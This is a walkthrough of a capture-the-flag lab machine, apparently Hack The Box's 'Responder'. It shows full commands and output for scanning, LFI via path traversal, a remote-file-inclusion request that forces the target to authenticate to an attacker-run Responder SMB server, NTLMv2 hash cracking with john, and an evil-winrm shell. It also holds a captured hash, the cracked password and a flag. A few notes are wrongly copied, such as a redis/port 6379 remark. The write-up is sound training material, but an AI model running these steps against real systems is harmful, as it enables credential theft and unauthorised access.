04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)
Last updated
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnroot@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding the -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80,5985
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80,5985
PORT STATE SERVICE
80/tcp open http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
5985/tcp open wsman
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
* identified domain as unika.htb
root@htb:~$ echo "10.129.16.1 unika.htb" | sudo tee -a /etc/hosts
10.129.16.1 unika.htb
root@htb:~$ BROWSER > http://unika.htb
* possible vulnerable entry points
- contact web form
- could be vulnerable to XSS, etc
- page parameter
- could be vulnerable to LFI/RFI#test for vulnerabilities: LFI/RFI
root@htb:~$ BROWSER > http://unika.htb/index.php?page=127.0.0.1
Warning: include(127.0.0.1): Failed to open stream: No such file or directory in C:\xampp\htdocs\index.php on line 11
Warning: include(): Failed opening '127.0.0.1' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11
* page errors could indicate posibility of LFI
root@htb:~$ BROWSER > http://unika.htb/index.php?page=\Windows\System32\drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost
* ALT: add path traversal in testing if the first method didn't work
- http://unika.htb/index.php?page=..\..\..\..\Windows\System32\drivers\etc\hosts#set up a malicious smb server
root@htb:~$ which responder
/usr/sbin/responder
root@htb:~$ locate Responder.conf
/etc/responder/Responder.conf
/usr/share/responder/Responder.conf
root@htb:~$ cat /etc/responder/Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = On
* ensure Responder is set to listen for SMB requests.
#start a malicious SMB server
root@htb:~$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.215 netmask 255.255.254.0 destination 10.10.14.215
root@htb:~$ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
...
[+] Listening for events...
...
#capture ntlm/ntlmv2 challenge and response
root@htb:~$ BROWSER > http://unika.htb/index.php?page=//10.10.14.215/somefile
Warning: include(\\10.10.14.215\SOMEFILE): Failed to open stream: Permission denied in C:\xampp\htdocs\index.php on line 11
Warning: include(): Failed opening '//10.10.14.215/somefile' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11
* somefile doesn't exist in the malicious smb server from the attacker
- responder will capture the smb challenge & response from the victim when
it tries to connect to the malicous smb server to grab the non-existent
file named "somefile"
* ALT:
- can create a malicious php code that can be passed to the target for RCE
RESPONDER...
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.16.1
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:a94235c50a1196f9:8CE0037C7F6C7000BF06CF534E3373C2:010100000000000000DF815F9284DB01B3126883A8CBDB2E00000000020008004E0031005500320001001E00570049004E002D005300350041005A005A0030003200580044004C004C0004003400570049004E002D005300350041005A005A0030003200580044004C004C002E004E003100550032002E004C004F00430041004C00030014004E003100550032002E004C004F00430041004C00050014004E003100550032002E004C004F00430041004C000700080000DF815F9284DB0106000400020000000800300030000000000000000100000000200000C4D24F968CC4766174734C562F245966630F53C6F2067E1E9D98970A2E4D3A4A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200310035000000000000000000
* captured challenge/response from the target which was trying to connect
to the malicious smb server from the attacker#crack captured challenge/response hash
root@htb:~$ echo "Administrator::RESPONDER:a94235c50a1196f9:8CE0037C7F6C7000BF06CF534E3373C2:010100000000000000DF815F9284DB01B3126883A8CBDB2E00000000020008004E0031005500320001001E00570049004E002D005300350041005A005A0030003200580044004C004C0004003400570049004E002D005300350041005A005A0030003200580044004C004C002E004E003100550032002E004C004F00430041004C00030014004E003100550032002E004C004F00430041004C00050014004E003100550032002E004C004F00430041004C000700080000DF815F9284DB0106000400020000000800300030000000000000000100000000200000C4D24F968CC4766174734C562F245966630F53C6F2067E1E9D98970A2E4D3A4A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200310035000000000000000000" | sudo tee -a target.txt
root@htb:~$ locate rockyou.txt
/usr/share/wordlists/rockyou.txt
root@htb:~$ cp /usr/share/wordlists/rockyou.txt .
root@htb:~$ john -w=rockyou.txt target.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2025-02-21 19:36) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.#connect to the target with the obtained credentials
root@htb:~$ which evil-winrm
/usr/bin/evil-winrm
root@htb:~$ evil-winrm -i 10.129.16.1 -u administrator -p badminton
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completio
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\mike\desktop
Directory: C:\users\mike\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\mike\desktop\flag.txt
ea81b7afddd03efaa0945333ed147fac